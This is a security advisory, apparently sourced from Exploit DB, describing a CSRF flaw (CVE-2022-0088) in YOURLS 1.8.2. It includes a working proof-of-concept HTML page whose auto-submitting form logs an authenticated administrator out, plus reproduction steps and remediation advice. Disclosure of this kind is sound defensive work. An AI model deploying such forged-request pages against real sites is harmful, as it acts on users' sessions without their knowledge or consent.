Version 1.8.2 of YOURLS has a security flaw that allows authenticated users to be victimized by a CSRF attack. An attacker could log an authenticated user out without their knowledge or consent.
Although on the surface this would seem to only affect users in this scenario; it also points out how there isn't any CSRF protection on sensitive administrative operations.
Vulnerability Information:
1. Product: YOURLS
2. Version: 1.8.2
3. Vulnerability Type: CSRF (Cross-Site Request Forgery)
4. CVE ID: CVE-2022-0088
5. Environment Tested: Windows
6. Reported By: CodeSecLab
The endpoint that is vulnerable allows state-changing requests to be made without requiring either a CSRF token or intent from the user. As such, an external site can send a request through a logged-in user's browser and execute that request, leading to unintended consequences for the user.
What’s the Risk?
If a logged in YOURLS administrator visits a malicious or compromised webpage, that page can automatically send a request to the YOURLS admin panel. In this case, the request forces the user to log out immediately.
Although this specific proof of concept demonstrates a logout action, similar weaknesses can often be extended to more impactful actions if other endpoints are exposed in the same way.
Proof of Concept
When opened by an authenticated YOURLS user, the browser silently sends the request, logging the user out without any interaction.
CSRF POI is the demonstration of submitting an automatic logout request via an HTML file.
CSRF PoC HTML File:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF PoC</title>
</head>
<body>
<form action="http://yourls/admin/index.php" method="GET">
<input type="hidden" name="action" value="logout">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
As soon as the authenticated user opens this file with their browser it sends the logout request to the server and logs the user out of their session without any user action required.
To replicate this issue:
1. Create file "poc.html" with attached code
2. Login to your YOURLS website
3. Navigate to the "poc.html" in the same browser session you created in [step 1]
4. Note that you have been automatically logged out from your YOURLS account
Importance of This Issue:
CSRF vulnerabilities can often be overlooked by developers, as they may not output indicators immediately (as is the case with a compromised system). However, as a security vulnerability, CSRFs fundamentally break the security model of the assumption that each action taken on a sensitive object (such as a blog or website) was done so intentionally by the user.
A user could be susceptible to an extensive range of cybersecurity attacks that stem from being logged out without their consent. Examples include disruption of a user's session (e.g., through DoS attacks), exploitation of social engineering techniques (as in phishing), and orchestrating multi-layered attacks using multiple methods concurrently.
Recommendations to Developers:
In light of this vulnerability, developers should strongly consider implementing CSRF tokens in addition to limiting sensitive actions to the use of POST requests only, as well as validating all user input that is deemed sensitive. Users who have an impacted version of YOURLS should refer to the YOURLS Project documentation available for remediation or addressing the issue.
It demonstrates that continuous security audits of a well-established and generally accepted open-source solution are necessary for all such solutions.
Source: Exploit DB
December 15, 2025
December 15, 2025
December 15, 2025
September 26, 2024
November 15, 2025
September 27, 2024
© 2016 - 2025 Red Secure Tech Ltd. Registered in England and Wales under Company Number: 15581067
